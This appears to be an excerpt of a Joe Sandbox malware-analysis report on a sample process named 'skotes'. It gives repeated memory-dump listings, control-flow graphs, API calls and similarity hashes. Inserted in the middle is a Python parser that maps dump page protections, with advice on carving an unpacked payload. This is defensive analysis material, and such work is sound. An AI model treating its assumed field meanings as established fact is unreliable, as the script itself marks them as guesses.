• Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2o
• API String ID: 1464230837-2760472518
• Opcode ID: 852a736faf2fddcc6e60ff563bf6e6ac5d125fca9e6870d6283ae30699675600
• Instruction ID: 0ca6a817d83a9c01cf3a58298fec4f697ad5f191aa44f21b9471249d533932e5
• Opcode Fuzzy Hash: 852a736faf2fddcc6e60ff563bf6e6ac5d125fca9e6870d6283ae30699675600
• Instruction Fuzzy Hash: F82148317042449BFF18ABACDC89B6DB7ABEBC1310F20421CE5048BBD5DB755A418A52

Control-flow Graph

Basic blocks (node id: address range, with calls or APIs reached in the block):
• 306: 69a856-69a86e
• 307: 69a89c-69a89e
• 308: 69a870-69a87c
• 309: 69a8a9-69a8b1, call 697d30
• 310: 69a8a0-69a8a7
• 311: 69a87e-69a88c
• 312: 69a892-69a899, call 6ad663
• 314: 69a8eb-69a916, call 6a80c0
• 316: 69a94e
• 319: 69a953-69a987, Sleep, CreateMutexA
• 320: 69a94e, call 6c6c6a
• 323: 69a8b3-69a8bb, call 697d30
• 324: 69a8e4-69a8e6
• 325: 69a98e-69a994
• 327: 69a9a7-69a9a8
• 328: 69a996-69a998
• 330: 69a99a-69a9a5
• 331: 69a8bd-69a8c5, call 697d30
• 335: 69a8c7-69a8cf, call 697d30
• 338: 69a8d1-69a8d9, call 697d30
• 341: 69a8db-69a8e2

Edges (block -> successors):
• 306 -> 307, 308
• 307 -> 309, 310
• 308 -> 311, 312
• 309 -> 323, 324
• 310 -> 314
• 311 -> 312, 316
• 312 -> 307
• 316 -> 319, 320
• 319 -> 325
• 320 -> 319
• 323 -> 324, 331
• 324 -> 314
• 325 -> 327, 328
• 328 -> 327, 330
• 330 -> 327
• 331 -> 324, 335
• 335 -> 324, 338
• 338 -> 324, 341
• 341 -> 314
APIs
• Sleep.KERNELBASE(00000064), ref: 0069A963
• CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2o
• API String ID: 1464230837-2760472518

Control-flow Graph

control_flow_graph 283 69a34f-69a35b 284 69a35d-69a36b 283->284 285 69a371-69a39a call 6ad663 283->285 284->285 286 69a93a 284->286 291 69a3c8-69a916 call 6a80c0 285->291 292 69a39c-69a3a8 285->292 288 69a953-69a994 Sleep CreateMutexA 286->288 289 69a93a call 6c6c6a 286->289 298 69a9a7-69a9a8 288->298 299 69a996-69a998 288->299 289->288 295 69a3aa-69a3b8 292->295 296 69a3be-69a3c5 call 6ad663 292->296 295->286 295->296 296->291 299->298 301 69a99a-69a9a5 299->301 301->298
APIs
• Sleep.KERNELBASE(00000064), ref: 0069A963
• CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2o
• API String ID: 1464230837-2760472518
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID: vl
                                                                                                                                                                                                                                          • API String ID: 3213747228-3645925279
                                                                                                                                                                                                                                          • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                          • Instruction ID: bf3f50399607ca427c2d8a53b31435ac0948c388bf40e27d1b47b3f6881d54bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7B103329046459FDB11CF68C841FFEBBA6EF4A360F1441AEE859DB341D6349D42CBA4
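The "Memory Dump Source" lists above name each dump as a dotted record, and the record itself tells an analyst most of what the disassembly header says in prose: which sandbox process and dump it belongs to (the `2_2` of `hcaresult_2_2_690000_skotes`), the base address of the region (the offsets listed), and the page rights and memory kind at the time of the dump. The following parser is an added example, not part of the Joe Sandbox report; it reconstructs the protection map of the skotes region based at 0x690000 from a subset of the names listed on this page. The field meanings are assumptions inferred from the listing: fields 1 and 2 are read as the process and dump index because they match the snapshot name, field 4 as the region base because it matches the listed offsets, and fields 5 and 7 are decoded against the Windows `PAGE_*` and `MEM_*` constants because every value present (0x04, 0x40, 0x80, 0x01000000) is a valid member of those sets. Field 3 is not a unique key (2311255567 appears twice above), so it and fields 6 and 8 are kept opaque.

```python
"""Parse Joe Sandbox .sdmp memory-dump names and rebuild a page-protection map.

Added example; not code from the Joe Sandbox report. Field semantics are
ASSUMPTIONS inferred from the listing on this page (see the comments on
the Dump fields). Sample names below are copied from the report's own
"Associated:" entries for process 2 / dump 2 (skotes, base 0x690000).
"""
import re
from collections import Counter
from dataclasses import dataclass

# winnt.h memory protection constants; assumed to be what field 5 carries.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# winnt.h memory type constants; assumed to be what field 7 carries.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
WRITE_AND_EXECUTE = {0x40, 0x80}

SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\."
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class Dump:
    process_index: int  # field 1, assumed: sandbox process number (the "2" in hcaresult_2_2_...)
    dump_index: int     # field 2, assumed: dump number for that process
    sequence: str       # field 3, opaque; not unique per dump, so kept as text
    base: int           # field 4: region base address (matches the listed offsets)
    protect: int        # field 5, assumed: MEMORY_BASIC_INFORMATION.Protect
    field6: str         # unknown, kept verbatim
    mem_type: int       # field 7, assumed: MEMORY_BASIC_INFORMATION.Type
    field8: str         # unknown, kept verbatim

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:x}")

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def writable_executable(self) -> bool:
        return self.protect in WRITE_AND_EXECUTE


def parse_sdmp(name: str) -> Dump:
    """Split one .sdmp file name into its fields; raise on anything else."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    g = m.groups()
    return Dump(int(g[0], 16), int(g[1], 16), g[2], int(g[3], 16),
                int(g[4], 16), g[5], int(g[6], 16), g[7])


def protection_map(names):
    """(base, protection, memory type) per dump, ordered by address."""
    dumps = sorted((parse_sdmp(n) for n in names), key=lambda d: d.base)
    return [(d.base, d.protect_name, d.mem_type_name) for d in dumps]


def wx_image_dumps(names):
    """Dumps of image-backed pages that are both writable and executable.

    A normally built PE maps code R-X and data RW-; image pages that are
    W+X are the observable behind the report's "Detected unpacking
    (changes PE section rights)" signature (or a packer's own RWX sections).
    """
    return [d for d in map(parse_sdmp, names)
            if d.mem_type == 0x1000000 and d.writable_executable]


def protection_summary(names):
    """How many dumps carry each protection value."""
    return dict(Counter(parse_sdmp(n).protect_name for n in names))


# Constructed sample: eight of the names listed on this page.
SAMPLE_DUMPS = [
    "00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmp",
    "00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp",
    "00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmp",
    "00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmp",
    "00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmp",
    "00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmp",
    "00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmp",
    "00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmp",
]

if __name__ == "__main__":
    for base, prot, kind in protection_map(SAMPLE_DUMPS):
        print(f"{base:#010x}  {kind:<10} {prot}")
    print(protection_summary(SAMPLE_DUMPS))
```

Run against the full list the alternation of 0x80 and 0x40 pages across the 0x88D000 to 0x9B0000 range is consistent with copy-on-write behaviour on image mappings: a page of a MEM_IMAGE region whose rights were raised to write+execute reports PAGE_EXECUTE_WRITECOPY until it is actually written, and PAGE_EXECUTE_READWRITE once a private copy exists. Under that reading the 0x40 pages are the ones the loader had already rewritten when the dump was taken, which is the region to prioritise when carving the unpacked payload.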
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Mtx_unlock$Cnd_broadcast
• String ID:
• API String ID: 32384418-0
• Opcode ID: b7b2c6e37a96bd0240c05db2bcfca8eefea8c625ce7caefea533d67e53b7c4ce
• Instruction ID: 04cc64f415b25e3605ee5b3d0642d13ddd00c4c9d9f808a0d1e98e8bcc12db80
• Opcode Fuzzy Hash: b7b2c6e37a96bd0240c05db2bcfca8eefea8c625ce7caefea533d67e53b7c4ce
• Instruction Fuzzy Hash: DEA1C170A01615AFDF21EF64C944BAAB7FAFF16324F048129E815D7B51EB31EA04CB91
APIs
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Xtime_diff_to_millis2_xtime_get
• String ID:
• API String ID: 531285432-0
• Opcode ID: 89cd37c8eec8293584f6b4ab9ccb8e18fb23059ae53279cd9d9df9d29aa15464
• Instruction ID: e33c62303ab160b84f54c5b304842113a3dc52c00c529879a39efe8211a090de
• Opcode Fuzzy Hash: 89cd37c8eec8293584f6b4ab9ccb8e18fb23059ae53279cd9d9df9d29aa15464
